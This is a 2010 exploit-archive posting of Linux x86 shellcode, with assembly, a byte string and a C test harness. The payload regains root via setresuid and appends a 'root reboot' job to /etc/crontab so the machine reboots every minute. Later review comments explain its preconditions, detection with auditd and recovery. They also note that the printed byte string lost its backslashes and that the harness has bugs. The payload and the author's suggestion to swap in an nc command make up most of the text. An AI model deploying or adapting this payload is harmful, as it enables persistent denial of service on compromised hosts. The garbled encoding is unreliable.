[linux/x86] - linux/x86 setreuid(0,0) add reboot command eac
Posted on 27 September 2010
/*
 * ====================================================================================
 * linux/x86 setreuid(0,0) and add reboot command each minutes in /etc/crontab 90 bytes
 * ====================================================================================
 */
#include <stdio.h>

/*
 * Title       : linux x86 shellcode setreuid(0, 0) and add reboot command each
 *               minute in /etc/crontab, 90 bytes
 * Author      : xertux
 * Platform    : Linux x86
 * Description : setuid(0) + open(/etc/crontab, 0x441, 0x180)
 *               + write(fd, "* * * * * root reboot\n", 22) + close(fd)
 *               Adds a line to /etc/crontab =>   * * * * * root reboot
 *               Reboots the computer every minute => a user does not have
 *               time to modify the /etc/crontab file.
 *               DoS shellcode; the author notes that the reboot command could
 *               be replaced by an nc command or many other commands.
 * Size        : 90 bytes
 *
 * NOTE(review): the title says setreuid(0,0) and the description says
 * setuid(0), but the listing below loads syscall number 0xa4 (164) with
 * ebx/ecx/edx zeroed, which on 32-bit x86 Linux is setresuid(0,0,0).
 *
 * NOTE(review), preconditions: the setresuid call and the append to
 * /etc/crontab only succeed when the process running this code already holds
 * root-equivalent privilege (root, or a setuid-root binary). The payload does
 * not gain privilege by itself; it turns an existing root compromise into a
 * persistent reboot loop.
 *
 * NOTE(review), detection and recovery: the only durable artefact is the
 * appended "* * * * * root reboot" line. An audit watch on the file (for
 * example auditd: -w /etc/crontab -p wa) or file-integrity monitoring
 * surfaces the append, and cron typically logs each job it starts. Because
 * the job fires within a minute of cron starting, cleanup usually means
 * booting rescue media or single-user mode and deleting the line.
 */

/*
BITS 32

; setresuid(0,0,0)
xor eax, eax            ; eax = 0
xor ebx, ebx            ; ebx = 0 (ruid)
xor ecx, ecx            ; ecx = 0 (euid)
cdq                     ; edx = 0 (suid), sign-extended from eax
mov al, 0xa4            ; syscall number 164 = setresuid
int 0x80                ; setresuid(0,0,0)

; open("/etc/crontab", 0x441, 0x180)
push edx                ; NUL terminator for the path string
push 0x6261746e         ; "ntab"
push 0x6f72632f         ; "/cro"
push 0x6374652f         ; "/etc"
mov ebx, esp            ; ebx -> "/etc/crontab" (the original note said "/etc//passwd")
mov WORD cx, 0x441      ; flags = O_WRONLY | O_APPEND | O_CREAT
mov WORD dx, 0x180      ; mode  = S_IRUSR | S_IWUSR (0600)
push BYTE 0x5           ; syscall number 5 = open
pop eax                 ; eax = 5
int 0x80                ; open("/etc/crontab", O_WRONLY | O_APPEND | O_CREAT, 0600)

; write(fd, "* * * * * root reboot\n", 22)
; (the original note here also carried a stray '==> pass "toor"' remark that
;  matches nothing in this listing)
mov ebx, eax            ; ebx = file descriptor returned by open
xor eax, eax            ; eax = 0
push eax                ; NUL terminator for the line
push WORD 0x0a74        ; "t\n"
push 0x6f6f6265         ; "eboo"
push 0x7220746f         ; "ot r"
push 0x6f72202a         ; "* ro"
push 0x202a202a         ; "* * "
push 0x202a202a         ; "* * "
mov ecx, esp            ; ecx -> "* * * * * root reboot\n" (the original note said ebx)
push BYTE 22            ; length of the line
pop edx                 ; edx = 22
mov al, 0x4             ; syscall number 4 = write
int 0x80                ; write(fd, "* * * * * root reboot\n", 22)

; close(fd)
push BYTE 0x6           ; syscall number 6 = close
pop eax                 ; eax = 6
int 0x80                ; close(fd); ebx still holds the descriptor

; NOTE(review): no exit syscall follows, so execution continues past the end
; of the buffer; the hosting process presumably crashes afterwards, which may
; leave a segfault record next to the crontab change.
*/

/*
 * Byte encoding of the listing above (90 bytes according to the author).
 * NOTE(review): the escape backslashes appear to have been lost when the page
 * was extracted; as printed, this literal is plain ASCII text rather than the
 * encoded bytes. It is reproduced here unchanged.
 */
char shellcode[] = "x31xc0x31xdbx31xc9x99xb0xa4xcdx80x52x68x6ex74x61"
                   "x62x68x2fx63x72x6fx68x2fx65x74x63x89xe3x66xb9x41"
                   "x04x66xbax80x01x6ax05x58xcdx80x89xc3x31xc0x50x66"
                   "x68x74x0ax68x65x62x6fx6fx68x6fx74x20x72x68x2ax20"
                   "x72x6fx68x2ax20x2ax20x68x2ax20x2ax20x89xe1x6ax16"
                   "x5axb0x04xcdx80x6ax06x58xcdx80";

/*
 * Test harness: prints the length of shellcode[] and then calls the array as
 * if it were a function taking no arguments.
 *
 * NOTE(review): strlen() is used without <string.h>, and %d does not match
 * the size_t that strlen() returns.
 * NOTE(review): shellcode[] is a writable data object, so the cast-and-call
 * only runs where data pages are executable; on systems that enforce
 * non-executable data it is expected to fault instead.
 */
int main() {
    printf("[*] Shellcode - length: %d ", strlen(shellcode));
    /* Reinterpret the array's address as void (*)() and call it. */
    (*(void(*)())shellcode)();
    return 0;
}